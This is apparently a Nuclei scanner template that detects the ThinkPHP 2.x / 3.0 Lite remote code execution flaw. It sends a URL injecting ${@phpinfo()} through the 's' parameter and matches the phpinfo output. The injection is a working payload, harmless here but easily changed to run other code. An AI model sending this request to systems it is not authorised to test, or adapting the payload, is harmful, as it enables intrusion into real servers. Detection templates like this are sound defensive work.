id: thinkphp-2-rce

info:
  name: ThinkPHP 2 / 3 's' Parameter RCE
  author: dr_set
  severity: critical
  description: ThinkPHP 2.x version and 3.0 in Lite mode Remote Code Execution.
  reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce
  tags: thinkphp,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?s=/index/index/name/$%7B@phpinfo()%7D"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and
      - type: status
        status:
          - 200
